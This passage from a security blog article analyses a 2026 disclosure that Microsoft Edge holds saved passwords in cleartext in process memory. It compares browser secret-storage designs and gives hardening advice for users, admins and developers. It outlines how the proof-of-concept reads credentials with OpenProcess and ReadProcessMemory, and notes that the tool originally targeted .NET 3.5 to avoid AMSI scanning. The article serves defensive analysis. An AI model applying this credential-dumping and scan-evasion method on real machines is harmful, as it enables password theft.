&lt;p&gt;Everything we have built so far -- IKNP, KOS, KKRT, CLR17, CHLR18, Cong et al., Apple&apos;s PSM, Google&apos;s k-anonymity wrapping, the entire CCS-grade cryptographic stack inside Edge -- assumes the &lt;em&gt;endpoint&lt;/em&gt; is trustworthy. The question Ronning asked on May 4, 2026 is what happens when it is not.&lt;/p&gt;
&lt;h3&gt;The disclosure&lt;/h3&gt;
&lt;p&gt;The X post arrived at 14:29:51 UTC on May 4, 2026 [@ronning-x]: &quot;Microsoft Edge loads all your saved passwords into memory in cleartext -- even when you&apos;re not using them.&quot; Five hours later the GitHub repository went public, with a complete C# proof-of-concept and a long README [@ronning-github]. PCWorld picked up the story two days later under the byline of Laura Pippig, summarising Microsoft&apos;s response in English [@pcworld-pippig-2026]. The Norwegian origin, ITavisen, carried the verbatim &quot;by design&quot; rendering and named Ronning&apos;s affiliation with the transmission-system operator Statnett [@itavisen-2026]. Davey Winder at Forbes reached Microsoft and obtained the official spokesperson statement on May 6, 2026 [@forbes-winder].Ronning works at Statnett and presented this finding at BigBiteOfTech (Palo Alto Networks Norway) on April 29, 2026 -- five days before the public X-post disclosure [@itavisen-2026]. The X bio describes &quot;#PenetrationTesting using only tools that are already on the system.&quot;&lt;/p&gt;
&lt;h3&gt;What the PoC does&lt;/h3&gt;
&lt;p&gt;The C# program is short. &lt;code&gt;OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, ...)&lt;/code&gt; against the parent &lt;code&gt;msedge.exe&lt;/code&gt;. A walk over committed memory regions via &lt;code&gt;VirtualQueryEx&lt;/code&gt;. &lt;code&gt;ReadProcessMemory&lt;/code&gt; reads of every region. Pattern matching for stored credential structures. Output: every saved Edge password as plaintext.&lt;/p&gt;
&lt;p&gt;The README is explicit on the constraints. &quot;Can be run without Adminstrator rights, but will only be able to access Edge processes ran by the same user. If run with Administrator privileges, the program can access and read memory from other users&apos; Edge processes on the same machine&quot; [@ronning-github]. No kernel exploit. No DPAPI bypass. The DPAPI unwrap happened earlier, when Edge launched (or when the password feature first activated); the cleartext has been sitting in &lt;code&gt;msedge.exe&lt;/code&gt;&apos;s heap ever since.&lt;/p&gt;
&lt;p&gt;The tested target is Edge 147.0.3912.98, but the README explicitly generalises: &quot;Any Edge versions that&apos;s Chromium based (from version 79 and newer, including 147.0.3912.98 and any future version, as Microsoft won&apos;t change this feature)&quot; [@ronning-github].&lt;/p&gt;
&lt;h3&gt;What the architectural choice is&lt;/h3&gt;
&lt;p&gt;The behaviour Ronning identifies is not a memory-safety bug. It is a design choice: Edge unwraps every DPAPI-protected saved credential into process memory when the password manager activates, and keeps the plaintext resident for the lifetime of the session.&lt;/p&gt;

flowchart TD
    A[&quot;Saved password file&lt;br /&gt;(SQLite blob)&quot;] --&amp;gt;|&quot;DPAPI-wrapped at rest&quot;| B[&quot;Disk: encrypted with&lt;br /&gt;per-user DPAPI key&quot;]
    B --&amp;gt;|&quot;msedge.exe launches&quot;| C[&quot;DPAPI CryptUnprotectData()&lt;br /&gt;unwraps key&quot;]
    C --&amp;gt;|&quot;password manager activates&quot;| D[&quot;Plaintext credentials&lt;br /&gt;resident in msedge.exe heap&quot;]
    D --&amp;gt;|&quot;OpenProcess + ReadProcessMemory&lt;br /&gt;(same-user, no admin)&quot;| E[&quot;EdgeSavedPasswordsDumper&lt;br /&gt;reads cleartext&quot;]
    D --&amp;gt;|&quot;autofill flow&quot;| F[&quot;Plaintext copied into&lt;br /&gt;renderer / web form&quot;]
    classDef warn fill:#7a3030,stroke:#a04848,color:#fce8e8
    class D warn,stroke:#c33
    classDef accent fill:#5d3a5d,stroke:#8a5a8a,color:#fde0fd
    class E accent,stroke:#939
&lt;p&gt;Chrome and Brave do not do this. Both browsers decrypt credentials only at the autofill RPC -- the password manager fetches the DPAPI-wrapped blob, decrypts in a narrow window, hands the plaintext to the relevant renderer, and zeroes the buffer [@chromium-os-crypt]. PCWorld corroborates: &quot;Other password managers, including those that are built into browsers, don&apos;t operate in this way -- Ronning says Edge is the only Chromium-based browser he&apos;s tested with this behavior&quot; [@pcworld-pippig-2026].&lt;/p&gt;
&lt;p&gt;In July 2024, Google announced Chrome App-Bound Encryption -- a further hardening of exactly this same-user-LCE threat model. ABE binds the on-disk key unwrap to a verified Chrome process identity, so a malicious program impersonating Chrome cannot ask DPAPI to unwrap Chrome&apos;s data even if it runs as the same user [@google-chrome-abe-2024]. Microsoft has the same DPAPI substrate; Edge has not adopted the equivalent control.&lt;/p&gt;
&lt;h3&gt;The .NET runtime tie-in to AMSI&lt;/h3&gt;
&lt;p&gt;The PoC&apos;s original implementation language is a noteworthy detail. Ronning&apos;s README states: &quot;.NET Framework 4.8.1 (changed from 3.5 originally)&quot; [@ronning-github]. The original .NET 3.5 choice was deliberate. The Antimalware Scan Interface (AMSI) [@ms-amsi-portal] scans .NET 4.8+ assemblies before execution; .NET 3.5 predates AMSI&apos;s &lt;code&gt;Amsi*&lt;/code&gt; API surface entirely [@ms-amsi-dotnet48].The current GitHub README has changed the framework version to .NET 4.8.1 (likely to ensure the PoC runs out-of-the-box on modern Windows), but the original framing -- and the original threat-model point -- was the AMSI evasion that .NET 3.5 enables. The sibling AMSI post in this series explains why the 3.5 framing matters.&lt;/p&gt;
&lt;h3&gt;Microsoft&apos;s response, verbatim&lt;/h3&gt;

Safety and security are foundational to Microsoft Edge. Access to browser data as described in the reported scenario would require the device to already be compromised. Design choices in this area involve balancing performance, usability, and security, and we continue to review it against evolving threats. Browsers access password data in memory to help users sign in quickly and securely -- this is an expected feature of the application. We recommend users install the latest security updates and antivirus software to help protect against security threats. -- Microsoft spokesperson, via Forbes, May 6, 2026 [@forbes-winder]

The statement is technically defensible. The threat model is exactly what the spokesperson says: an attacker who can already execute code as the user on the user&apos;s machine. In MSRC&apos;s published servicing criteria [@msrc-servicing-criteria], &quot;exploitation requires local code execution&quot; is a recurring boundary line -- the same line MSRC applied to Mimikatz against LSASS in the pre-Credential-Guard era, and that Microsoft eventually crossed by shipping [Credential Guard](/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/). The &quot;by design&quot; framing is consistent with a decade of precedent.
Microsoft&apos;s response is internally consistent with a decade of MSRC policy. The &quot;exploitation requires local code execution&quot; framing was applied to Mimikatz against LSASS for years before Credential Guard arrived. It is applied to &quot;give me a debugger and I can read anything&quot; type attacks generally. The position is not improvised, and it is not a special accommodation for Edge. The question this article asks is not &quot;is the position internally consistent&quot; -- it is -- but &quot;what threat model does the position concede.&quot; The answer is the same-user local-code-execution threat model. Whether the concession is acceptable depends on whether the user&apos;s environment makes same-user LCE rare (a single-user Surface) or routine (a Citrix farm, an AVD pool, a shared family computer).
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you operate a multi-user Windows host -- RDS, AVD, Citrix, a shared lab, a family PC with multiple sign-in accounts -- every Edge session&apos;s saved credentials are recoverable by any same-user process during that session, and by an administrator across sessions. The &quot;the device is already compromised&quot; framing is asymmetric: a same-user LCE event on a multi-user host is structurally more common than on a single-user laptop, because there are more identities sharing the same physical machine.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Edge does not have a credential-storage vulnerability. Edge has a credential-storage architectural choice. The choice is to spend the entire browser session&apos;s worth of plaintext-in-RAM budget on autofill UX latency. The choice is defensible. It is also a precise statement of which threats the Edge product team is and is not defending against.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s response is technically defensible. It is also a precise statement of which threat model the Edge product team is and is not defending against. To see why both halves of this article describe the same product, we need to look at the architectural alternatives.&lt;/p&gt;
&lt;h2&gt;8. Competing approaches: where should the secret store live?&lt;/h2&gt;
&lt;p&gt;Three architectural positions present themselves, as siblings rather than as a generational ladder:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Browser-as-secret-store, decrypt-on-launch&lt;/strong&gt; (Edge today). Plaintext-in-RAM window: the entire session. Autofill latency: a memcpy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Browser-as-secret-store, decrypt-on-autofill&lt;/strong&gt; (Chrome, Brave). Plaintext-in-RAM window: the autofill RPC. Autofill latency: one DPAPI unwrap per fill (microseconds).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OS-as-secret-broker&lt;/strong&gt; (the design the Windows Credential Manager and DPAPI-NG already implement for native apps). Plaintext never crosses into the browser&apos;s process; a higher-privileged broker holds the plaintext at autofill time and the browser receives a handle, not the secret.&lt;/li&gt;
&lt;/ol&gt;

flowchart LR
    subgraph &quot;Decrypt-on-launch (Edge)&quot;
        A1[Disk: DPAPI blob] --&amp;gt; A2[Browser process&lt;br /&gt;plaintext, full session]
        A2 --&amp;gt; A3[Renderer: autofill memcpy]
    end
    subgraph &quot;Decrypt-on-autofill (Chrome / Brave)&quot;
        B1[Disk: DPAPI blob] --&amp;gt; B2[Browser process&lt;br /&gt;plaintext, narrow RPC]
        B2 --&amp;gt; B3[Renderer: autofill]
    end
    subgraph &quot;OS-as-secret-broker&quot;
        C1[Disk: DPAPI-NG blob] --&amp;gt; C2[OS broker process&lt;br /&gt;plaintext only here]
        C2 -.handle.-&amp;gt; C3[Browser receives handle]
        C3 -.autofill via broker.-&amp;gt; C4[Renderer]
    end
&lt;h3&gt;Six-axis comparison&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Decrypt-on-launch (Edge)&lt;/th&gt;
&lt;th&gt;Decrypt-on-autofill (Chrome, Brave)&lt;/th&gt;
&lt;th&gt;OS-as-broker&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Plaintext-in-RAM window&lt;/td&gt;
&lt;td&gt;Full session&lt;/td&gt;
&lt;td&gt;Autofill RPC (~ms)&lt;/td&gt;
&lt;td&gt;Never, in the browser process&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Autofill latency&lt;/td&gt;
&lt;td&gt;Memcpy (nanoseconds)&lt;/td&gt;
&lt;td&gt;DPAPI unwrap (~10s of microseconds)&lt;/td&gt;
&lt;td&gt;IPC + broker policy check (~ms)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same-user-LCE attack surface&lt;/td&gt;
&lt;td&gt;High (ReadProcessMemory exposes all)&lt;/td&gt;
&lt;td&gt;Low (must catch the RPC window)&lt;/td&gt;
&lt;td&gt;Negligible (no plaintext in the browser)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory-scraping forensics&lt;/td&gt;
&lt;td&gt;Trivial (any same-user dump works)&lt;/td&gt;
&lt;td&gt;Hard (must dump during fill)&lt;/td&gt;
&lt;td&gt;Impossible (no plaintext to dump)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sync UX with cloud account&lt;/td&gt;
&lt;td&gt;Standard&lt;/td&gt;
&lt;td&gt;Standard&lt;/td&gt;
&lt;td&gt;Standard (broker handles sync)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Engineering cost to ship&lt;/td&gt;
&lt;td&gt;Already shipped&lt;/td&gt;
&lt;td&gt;Already shipped (Chromium baseline)&lt;/td&gt;
&lt;td&gt;High (broker IPC, signed code path, extension renegotiation)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The OS-broker position is not hypothetical. The Windows Credential Manager already provides this property for Windows-app credentials. &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;WebAuthn and passkeys&lt;/a&gt; provide it for sites that have adopted the standard. The DPAPI-NG protection descriptors include a &lt;code&gt;WEBCREDENTIALS=&lt;/code&gt; variant [@ms-learn-dpapi-ng][@ms-learn-dpapi-ng-descriptors]. &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt;-anchored vTPM key unwrap provides a hardware-rooted broker substrate [@ms-learn-pluton]. Credential Guard&apos;s LSAISO trustlet is architecturally an isolated secret-broker for LSASS-derived secrets [@ms-learn-credential-guard].&lt;/p&gt;
&lt;p&gt;None of these primitives are wired into Edge&apos;s saved-passwords path. The engineering cost is non-trivial: the broker needs an IPC contract, the browser needs a signed-and-attested code path that talks to the broker, and the renderer extension API surface needs renegotiation. But the cost is finite, and the alternative is what Google has been shipping in Chrome since 2024 -- Chrome&apos;s App-Bound Encryption (see §7) is exactly a step toward the broker model, and Microsoft has the same DPAPI substrate but no equivalent control for Edge [@google-chrome-abe-2024].&lt;/p&gt;
&lt;h3&gt;What &quot;by design&quot; means structurally&lt;/h3&gt;
&lt;p&gt;Microsoft can take the &quot;by design&quot; position because they are not wrong about cryptography. They are right about the bound. No protocol can autofill plaintext into a child renderer without &lt;em&gt;some&lt;/em&gt; process in the chain holding plaintext at the moment of fill. The architectural question is &lt;em&gt;which&lt;/em&gt; process and &lt;em&gt;for how long&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Edge&apos;s answer: &quot;the parent browser process, for the entire session.&quot; Chrome and Brave&apos;s answer: &quot;the parent browser process, for the autofill RPC.&quot; The broker design&apos;s answer: &quot;a separate, higher-privileged process, for the autofill RPC, and never the browser at all.&quot;&lt;/p&gt;
&lt;p&gt;All three are valid points in the design space. The question is not &quot;which is right&quot; -- the answer depends on the user&apos;s environment -- but &quot;what should the default be for a 2026 consumer browser.&quot; The PSI half of the article shows Microsoft can choose the most demanding default when they want to. The endpoint half shows what default they chose here.&lt;/p&gt;
&lt;p&gt;To see why this is a structural property of the problem, not a Microsoft-specific gap, we need to look at the theoretical limits on both sides.&lt;/p&gt;
&lt;h2&gt;9. Theoretical limits&lt;/h2&gt;
&lt;p&gt;Two lower bounds, in parallel: one cryptographic (the PSI side), one architectural (the endpoint side).&lt;/p&gt;
&lt;h3&gt;PSI side: communication and computation lower bounds&lt;/h3&gt;
&lt;p&gt;The communication lower bound for PSI is folklore, used as the comparison baseline in Pinkas-Schneider-Zohner at USENIX Security 2014 [@psz-2014]. Informally: any PSI protocol must transmit at least $\Omega(\min(n_A, n_B) \cdot \kappa)$ bits, where $\kappa$ is the security parameter. The argument is information-theoretic: the receiver has to learn the intersection, which can have size up to $\min(n_A, n_B)$, and each element identifier needs $\Omega(\kappa)$ bits of representation to avoid collisions.&lt;/p&gt;
&lt;p&gt;Silent OT [@silent-ot-2019] meets this lower bound up to polylogarithmic factors in the symmetric balanced setting. HE-PSI in the asymmetric setting gets to $O(n_R \cdot \log n_S)$ ciphertexts via CLR17&apos;s partition-and-evaluate construction [@clr-2017], which is sublinear in $n_S$ -- the breakthrough that makes Edge Password Monitor practical.&lt;/p&gt;
&lt;p&gt;The computation lower bound on the sender side is $\Omega(n_S)$. The sender must, in the limit, touch each element of its set at least once per query. There is no way around this without trading correctness or privacy. Apple &quot;cheats&quot; by reducing the effective $n_S$: their 15-bit bucket cuts the per-query work to roughly $1.5\text{B} / 2^{15} \approx 46{,}000$ elements. Microsoft&apos;s two-byte shard cuts to roughly $5\text{B} / 2^{16} \approx 76{,}000$ elements. The lower bound applies &lt;em&gt;per shard&lt;/em&gt;, not per total corpus.&lt;/p&gt;
&lt;p&gt;The OT-extension lower bound is $\Omega(\kappa)$ base OTs per protocol session, with the bulk of the OT count amortised away by symmetric crypto. KOS15 meets this; Silent OT improves the wire constants further. By 2026, OT extension is essentially solved engineering.&lt;/p&gt;
&lt;h3&gt;Endpoint side: the &quot;no plaintext in process&quot; lower bound&lt;/h3&gt;
&lt;p&gt;The cryptographic side is comfortably tight. The endpoint side is much weirder.For a process $P$ to autofill a credential into a child form, &lt;em&gt;some component&lt;/em&gt; in the trust chain must hold the plaintext at the moment of fill. There are exactly three possible holders:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;$P$ itself.&lt;/strong&gt; The Edge design. Plaintext lives in the parent browser process throughout the session.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A child renderer $Q$.&lt;/strong&gt; The Chrome / Brave design. Plaintext crosses the parent-renderer boundary for the duration of the autofill RPC and gets zeroed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A separate higher-privileged broker $B$.&lt;/strong&gt; The OS-broker design. Plaintext lives in a sibling process that is harder to dump than the browser (in the limit, a PPL or a Credential-Guard-style trustlet).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;No general cryptographic primitive lets a process &lt;em&gt;use&lt;/em&gt; a plaintext credential without ever &lt;em&gt;holding&lt;/em&gt; it. The plaintext is a value; the operations on it (paste-into-form, compute-HMAC-with-it, transmit-over-TLS-as-a-bearer-token) all require it in cleartext at some point. This is not a deficiency of any particular cryptosystem. It is the definition of &quot;use.&quot;&lt;/p&gt;
&lt;p&gt;The plaintext-RAM design Edge ships is not a cryptographic failure. It is a deliberate choice to spend the plaintext-in-RAM budget on UX latency. The escape hatch is &lt;em&gt;architectural&lt;/em&gt;: a hardware-isolated broker process. Pluton-anchored vTPM key unwrap [@ms-learn-pluton], Credential Guard&apos;s LSAISO pattern [@ms-learn-credential-guard], DPAPI-NG with the right protection descriptor [@ms-learn-dpapi-ng-descriptors] -- the OS primitives all exist.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; There is no cryptographic primitive that lets a process autofill plaintext without holding it. The only escape hatch is an architectural one: a higher-privileged broker. Microsoft already ships the broker primitives -- DPAPI-NG, Credential Guard, Pluton. They are not wired into Chromium.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The aha moment the rest of the article was built to deliver: the Ronning PoC is not a &quot;bug&quot; in any meaningful sense. The structural question is whether Microsoft should ship the architectural primitive -- which they already have, in DPAPI-NG and Credential Guard -- but have not wired into Chromium&apos;s password store. The &quot;by design&quot; response is technically true and politically convenient simultaneously. Both are correct readings.&lt;/p&gt;
&lt;p&gt;Both lower bounds are tight or near-tight today. The PSI side is essentially solved engineering; the endpoint side is essentially solved policy and unsolved deployment. The open questions are about which side we invest in next.&lt;/p&gt;
&lt;h2&gt;10. Open problems&lt;/h2&gt;
&lt;p&gt;Four open problems, framed as research directions Microsoft, Apple, and Google have not jointly committed to.&lt;/p&gt;
&lt;h3&gt;Open problem 1: post-quantum PSI and OT extension&lt;/h3&gt;
&lt;p&gt;Every deployed breach-checking protocol today rests on assumptions &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;Shor&apos;s algorithm&lt;/a&gt; breaks. The OPRFs in Apple PSM and Google Password Checkup rely on discrete log over elliptic curves; the HE-PSI in Edge Password Monitor relies on BFV-on-classical-parameters; Paillier (historic, FNP04) relies on integer factorisation. Harvest-now-decrypt-later exposure on durable transcripts is the near-term migration question: an adversary capturing PSI transcripts today and storing them until a cryptographically relevant quantum computer arrives could, in principle, reconstruct the queries.&lt;/p&gt;
&lt;p&gt;Lattice-based OT extension exists at currently-secure parameters, at roughly $10\times$ the communication of IKNP per OT in early prototypes. Whether the breach-checking deployments at Microsoft, Apple, and Google migrate on the same timeline as the rest of TLS (the IETF post-quantum-handshake transition) is an open coordination problem.&lt;/p&gt;
&lt;h3&gt;Open problem 2: multi-party breach corpora&lt;/h3&gt;
&lt;p&gt;No production deployment of a $&amp;gt;2$-party breach-checking service exists. HIBP, Google, Apple, and Microsoft each hold corpora that overlap but contain unique breaches. Consolidating them privately -- so a query gets the union of all four corpora&apos;s match metadata without any one provider learning more than their own corpus contributed -- would meaningfully improve detection.&lt;/p&gt;
&lt;p&gt;The academic literature on multi-party PSI is substantial and growing, but the engineering and the governance work has not been done. Each provider has a different commercial relationship with the breach dataset, a different legal posture, and a different operational interest in their corpus being canonical. The cryptographic primitive is the easy part.&lt;/p&gt;
&lt;h3&gt;Open problem 3: sub-linear sender-side amortisation&lt;/h3&gt;
&lt;p&gt;The $\Omega(n_S)$ sender-side computation lower bound is &lt;em&gt;per query&lt;/em&gt;. For a service serving billions of queries against a static $S_S$, can per-query cost be amortised across queries via a preprocessing step the sender pays once?&lt;/p&gt;
&lt;p&gt;Cong et al. 2021 [@cong-2021] reduces constants substantially and pushes the practical envelope. Sub-linear &lt;em&gt;asymptotic&lt;/em&gt; sender-side cost is open. The information-theoretic barrier is real -- the sender must touch any element that could be in the receiver&apos;s query -- but the &lt;em&gt;expected&lt;/em&gt; cost over many queries against a static corpus admits a more aggressive analysis under the right access patterns.&lt;/p&gt;
&lt;h3&gt;Open problem 4: hardware-broker browser secret stores&lt;/h3&gt;
&lt;p&gt;The endpoint architectural problem. Migrate Edge, Chrome, and Brave from &quot;process-RAM plaintext&quot; to &quot;OS-broker (plaintext never crosses into the browser)&quot; using DPAPI-NG with a broker-PPL protection descriptor or a Credential Guard-style trustlet.&lt;/p&gt;
&lt;p&gt;WebAuthn and passkeys offer this property already -- the platform authenticator holds the private key, and the browser receives signed assertions without ever seeing the secret. But passkeys require per-site enrollment that traditional username-password sites have not adopted at scale; the long tail of legacy login forms will remain on saved-passwords-as-strings for years.&lt;/p&gt;
&lt;p&gt;The Windows Credential Manager offers the broker property for &lt;em&gt;Windows-app&lt;/em&gt; credentials -- but it is not wired into Chromium for &lt;em&gt;browser&lt;/em&gt; credentials. The engineering work is real; the cryptographic work is essentially trivial. Whether and when Microsoft, Google, or Brave commit to it is the question.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Open problem&lt;/th&gt;
&lt;th&gt;What&apos;s been tried&lt;/th&gt;
&lt;th&gt;Current best&lt;/th&gt;
&lt;th&gt;Why it matters&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Post-quantum PSI&lt;/td&gt;
&lt;td&gt;Lattice-based OT, ring-LWE OPRFs&lt;/td&gt;
&lt;td&gt;Prototype-grade; 10x classical at ~secure parameters&lt;/td&gt;
&lt;td&gt;Harvest-now-decrypt-later on PSI transcripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-party breach corpora&lt;/td&gt;
&lt;td&gt;Multi-party PSI literature (e.g., Kolesnikov et al. CCS 2017)&lt;/td&gt;
&lt;td&gt;Academic constructions; no production deploy&lt;/td&gt;
&lt;td&gt;Each provider&apos;s corpus has unique recall&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sub-linear sender cost&lt;/td&gt;
&lt;td&gt;Cong et al. 2021 constants reduction&lt;/td&gt;
&lt;td&gt;Linear $\Omega(n_S)$ per query&lt;/td&gt;
&lt;td&gt;$5 \times 10^9$ corpus, billions of queries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware-broker secret stores&lt;/td&gt;
&lt;td&gt;WebAuthn / passkeys; DPAPI-NG, Credential Guard&lt;/td&gt;
&lt;td&gt;Standards exist; wiring into browsers is missing&lt;/td&gt;
&lt;td&gt;The Ronning PoC threat model&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Open Chromium&apos;s process tree on Windows (Task Manager: Details, group by Path) and look for the `Google Chrome.exe` (or `msedge.exe`) process running with the `--type=` argument absent -- that&apos;s the parent. App-Bound Encryption binds the DPAPI unwrap to that exact parent process&apos;s signature, so a same-user attacker masquerading as Chrome cannot ask DPAPI to unwrap Chrome&apos;s data even with the right user identity. The architectural primitive is sitting in Chrome&apos;s source tree as of July 2024 [@google-chrome-abe-2024]; the equivalent control for Edge&apos;s password store has not shipped.
&lt;p&gt;These four open problems share a structure: each would require coordination across multiple vendors and across the cryptography / platform / browser boundary. None is research-blocked. All are governance-blocked.&lt;/p&gt;
&lt;h2&gt;11. Practical guide&lt;/h2&gt;
&lt;p&gt;What should you do this week?&lt;/p&gt;
&lt;h3&gt;Users&lt;/h3&gt;
&lt;p&gt;If your Edge browser is your password manager and you are on a single-user laptop you control end-to-end, the Ronning PoC&apos;s threat model is &quot;an attacker who can run code as you on your own machine.&quot; If that happens, the attacker is already in a strong position regardless of how Edge holds passwords -- they can keylog the next login, screenshot anything you autofill, or install a malicious browser extension. The marginal risk of the plaintext-RAM design on a single-user laptop is real but bounded.&lt;/p&gt;
&lt;p&gt;If you share a Windows host -- a family PC with multiple accounts, a small-business workstation several employees sign into, a domain-joined laptop on which IT has administrative access -- the calculus changes. Any same-user process can read your Edge plaintext during your session. Any administrator can read it across sessions (the PoC&apos;s &quot;Administrator can access other users&apos; Edge processes&quot; mode). The case for moving saved credentials out of Edge into a dedicated password manager (1Password, Bitwarden, KeePass) is structurally stronger here.&lt;/p&gt;
&lt;p&gt;A dedicated password manager usually still keeps plaintext in &lt;em&gt;its&lt;/em&gt; own process RAM during autofill -- this is the §9 lower bound asserting itself. The difference is the size of the plaintext-in-RAM window: dedicated password managers tend to require an explicit unlock and re-lock after a configurable idle period. Edge&apos;s window is the entire browser session.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On a multi-user Windows machine -- RDS, AVD, Citrix, a family computer with separate accounts -- disable Edge&apos;s password manager via the &lt;code&gt;PasswordManagerEnabled&lt;/code&gt; group policy and route users to an out-of-process credential broker (1Password&apos;s CLI integration, Bitwarden&apos;s desktop helper, or the platform Credential Manager).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Windows admins&lt;/h3&gt;
&lt;p&gt;The two relevant Edge enterprise policies are documented on Microsoft Learn:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;PasswordManagerEnabled&lt;/code&gt;&lt;/strong&gt; [@ms-learn-passwordmanagerenabled] -- turns Edge&apos;s saved-passwords feature on or off entirely. On a multi-user host with sensitive data, the right value is &lt;code&gt;0&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;PasswordMonitorAllowed&lt;/code&gt;&lt;/strong&gt; [@ms-learn-edge-pm] -- controls whether Password Monitor&apos;s breach-checking PSI runs at all. The default is &quot;user-controlled&quot;; in a managed enterprise, you may want to mandatorily enable it (independent of whether the password manager itself is enabled, because Password Monitor can check passwords you type into login forms, not just ones you have saved).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For RDS, AVD, and Citrix environments specifically, the threat model is structurally worse than a single-user laptop. Multiple users share a single Windows host. Their Edge profiles are isolated by Windows ACLs but their &lt;em&gt;processes&lt;/em&gt; are not isolated against an administrator. The PoC&apos;s &quot;Administrator privileges can access other users&apos; Edge processes&quot; mode is exactly the privilege available to a session-host administrator who has been compromised, or to a malicious tenant who escalates locally.&lt;/p&gt;

On a shared-tenant Windows host, the question is not whether same-user LCE will occur -- it is structurally more common than on a single-user laptop -- but how containable it is when it does. Saved browser credentials are an outsized lever for an attacker who pivots laterally: a single compromised user account on a session-host can yield every saved corporate credential for that user, and an administrator escalation can yield every saved credential for every user on the host. The hardening recommendation is to disable browser-based password management entirely (`PasswordManagerEnabled=0`) on session-host images, document an approved credential broker for your environment (Windows Credential Manager for native apps; an enterprise password manager with broker integration for browsers), and audit Edge profile directories on session-host images for stale `Login Data` SQLite files left over from earlier deployments.
&lt;h3&gt;Developers&lt;/h3&gt;
&lt;p&gt;If you ship a component that handles credentials, the design lesson from §9 is not &quot;never hold plaintext&quot; -- you cannot avoid it without an OS-level broker -- but &quot;minimise the plaintext-in-RAM window.&quot;&lt;/p&gt;
&lt;p&gt;The Chrome App-Bound Encryption pattern from July 2024 [@google-chrome-abe-2024] is a template: bind your at-rest key unwrap to a verified process identity so an attacker who exfiltrates your wrapped data cannot trivially unwrap it from a different process. If you must hold plaintext in the parent process for the lifetime of the session (the Edge design), make the trade explicit in the threat model documentation and ensure operations consuming the plaintext are auditable.&lt;/p&gt;
&lt;p&gt;If you can architecturally afford a broker, do it. The IPC cost is real (low-microsecond per call) but small compared to the operational reduction in incident severity. WebAuthn / passkeys are the long-term destination for credentials; the broker pattern is the short-term destination for everything else.&lt;/p&gt;
&lt;h2&gt;12. Frequently asked questions&lt;/h2&gt;

Yes, at rest on disk. DPAPI wraps the symmetric key that encrypts Edge&apos;s `Login Data` SQLite file under a key chain rooted in the user&apos;s password. When the user is logged out (or the machine is powered off), the on-disk blob is opaque to anyone who does not have the user&apos;s DPAPI credentials. The protection ends the moment Edge unwraps the DPAPI blob into process memory, which happens during browser launch or the first password-feature activation. Once unwrapped, the credentials sit in `msedge.exe`&apos;s heap until the process exits, and `ReadProcessMemory` from any same-user process reads them as plaintext. DPAPI is an at-rest control, not an in-memory one.

Partially. If Edge ran as a protected process at an appropriate signature level, only an antimalware-PPL-elevated process could open it for `ReadProcessMemory`, which would substantially raise the bar against a same-user attacker. Browser-process PPL has implications for every loaded DLL (each must be signed at or above the host&apos;s PPL level) and every extension API the renderer expects to call. Chrome and Brave have not adopted PPL for the browser process either. Microsoft has the option; they have not used it. PPL would address the same-user-LCE concern but not the administrator-across-sessions concern.

No. Credential Guard isolates LSASS-derived secrets (NTLM hashes, Kerberos tickets, cached credentials) into the LSAISO trustlet running under Virtualization-Based Security, which is unreachable from the normal-world kernel let alone normal-world user-mode processes. It does not cover browser-owned secrets. Saved Edge credentials live in `msedge.exe`&apos;s heap, not in LSASS, and Credential Guard does not extend protection to arbitrary user-mode application secret stores.

